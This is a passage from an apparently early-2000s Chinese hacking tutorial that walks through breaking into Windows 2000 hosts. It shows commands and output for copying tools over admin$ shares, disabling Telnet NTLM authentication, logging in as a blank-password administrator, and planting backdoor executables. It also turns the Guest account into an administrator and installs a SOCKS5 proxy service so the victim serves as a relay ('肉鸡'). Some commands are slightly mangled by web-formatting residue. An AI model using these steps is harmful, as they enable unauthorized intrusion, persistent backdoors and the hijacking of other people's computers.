黑棵.txt

如果计算机内存已有病毒(或者说计算机已染毒)

(C) Copyright 1985-1999 Microsoft Corp. 

C:\WINNT\system32 <---------------------------------------------成功了! 

C:\>copy ntlm.exe \\xxx.xxx.xxx.xxx\admin$Content$nbsp;<----再开一个命令行窗口，把ntlm.exe(修改Windows 2K Telnet身份验证)传到目标主机上 

回到刚才开的telnet的窗口 
Microsoft Windows 2000 [5.00.2195] 
(C) Copyright 1985-1999 Microsoft Corp. 

C:\WINNT\system32\ntlm.exe <------------------------------------启动ntlm吧！ 
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. 

Done! <---------------------------------------------------------好了，成功取消了2000的身份验证！ 

C:\WINNT\system32\net start telnet <--------------------------------------------用net start命令直接启动telnet服务吧 
Telnet 服务正在启动... 
Telnet 服务已经启动。 

键入exit,切断和目标主机的telnet连接，然后再次telnet到目标主机： 


C:\WINNT\system32\telnet xxx.xxx.xxx.xxx <--------------------------------------这次直接连接默认端口23就可以了！ 
login:administrator 
Password: <---------------------------------------------------------------------密码为空的就不打了，呵呵！~~ 
其实在这样登陆后，为了以后我们还可以重复利用这台主机，我们应当学会给自己留条后路，那就是留后门啦： 


C:\>WINNT\system32\copy srv.exe c:\inetpub\scripts <--------------------留个后门 
C:\>WINNT\system32\cmd.exe c:\inetpub\scripts\winserver.exe <-----------还留一个，有备无患嘛！ 

C:\>net user Guest /active:yes <----------------------------------------激活Guest用户 
C:\net user Guest 1234567890 <------------------------------------------将Guest的密码改为1234567890，你可以随意设置 
C:\>net localgroup administrators Guest /add <--------------------------将Guest加入超级管理员组，你就是administrator了^_^ 

好了，后门也留够了，这下可以放心了。下次如果管理员的密码改了，只要Guest没有修改，你就可以用Guest来登陆目标主机了！ 


  5.Sock5代理跳板篇（用到的程序：sksockserver.exe,由Snake制作的sock5代理跳板制作工具） 
经常有朋友会问起关于Sock5代理的问题，可见大家都对它很感兴趣，所以我觉得还是有必要在这里介绍一下（Sock5代理真的很有用哦） 
代理跳板的原理，可以参见以下的示意图： 

加密数据 加密数据 普通数据 
[]=======[]=======[]=======[]========[]=：：：=[]=======[] 
工作站 跳板1 跳板2 跳板3 跳板4 跳板N 目标机 

好的，开始制作Sock5代理跳板咯！先用IPC$登陆到目标主机上，方法见上文IPC$共享弱密码漏洞篇。然后进入命令提示符状态： 

C:\>copy c:\snake\Sksockserver.exe \\xxx.xxx.xxx.xxx\c$\admin$Content$nbsp;<----------------将sksockserver.exe拷贝到目标主机 
C:\>telnet xxx.xxx.xxx.xxx <------------------------telnet到目标主机上去。如果没开telnet，参见上文打开telnet服务 
Microsoft (R) Windows 2000 (TM) Version 5.00 (Build 2195) 
Welcome to Microsoft Telnet Client 
Telnet Client Build 5.00.99203.1 

Escape Character is 'CTRL+]' 

You are about to send your password information to a remote computer 
in Internet zone. This might not be safe. Do you want to send it anyway(y/n):y 
NTLM Authentication failed due to insufficient credentials. 
Please login with 
clear text username and password 
Microsoft (R) Windows (TM) Version 5.00 (Build 2195) 
Welcome to Microsoft Telnet Service 
Telnet Server Build 5.00.99201.1 
login:administrator 
password: ********** <-----------------------------此处输入你得到的管理员的密码 
*========================================================== 
Microsoft Telnet 
*========================================================== 
C:\> <---------------------------------------------登陆成功了，现在要安装sksockserver程序了！ 

C:\>sksockserver.exe <-----------------------------不带任何参数就会显示帮助文档。好好看看吧！ 
SkServer - is freeware, All Rights Reserved by snake.2001. 
Run with paramater below list: 
-Install (Install the service) 
-Remove (Remove the service) 
-Debug 1813 (Run as console program at port 1813) 

~ Next are about service registry value setting ~ 
-config Show [Port/StartType/Client/SkServer] (Show current config) 
-config Port [NewPort] (Set/Show SkServer's Port) 
-config StartType [1~3] (Set/Show StartType) 
( 2-Auto, 3-Manual, 4-Disable) 
-config Client [add/del/change] [IP Mask Enable] 
(Show/add/del/change Client Set) 
-config SkServer [add/del/change] [IP Port Enable] 
(Show/add/del/change Pass Skserver Set) 

C:\>sksockserver -install <------------------------好的,现在开始安装! 
如果你想来个连跳,那么安装后还要做一下设置。先看看默认设置情况: 
C:\>sksockserver -config show 
SkServer Port = 1080 <-----------------------------开放服务的端口 
SkServer StartType: 3 - Manual <-------------------服务启动方式 
SkServer Enable Client Set Num:0 <-----------------客户端的项目个数 
SkServer Pass SkServer Number:0 <------------------经过SkServer的项目个数 

如何设置连跳: 
c:> SkSockServer -config client'ip [add/del] === [显示/增加/删除 客户端的项目] 
c:> SkSockServer -config SkServer'ip [add/del] === [显示/增加/删除 经过SkServer的项目] 

C:\>net start skserver <---------------------------启动服务了！！！！！！！！！！！ 

C:\>net start <------------------------------------检查是否启动成功！ 
These Windows 2000 services are started: <---------显示目标主机上所有的已启动的服务 

Snake SockProxy Service <--------------------------好的,就是它,已经开始工作了! 
Telnet ...... 

The command completed successfully. <--------------命令成功执行！ 
C:\> <---------------------------------------------到此，我们的Sock5代理跳板就做好了。不光可以用来当肉鸡用，还可以上QQ呢！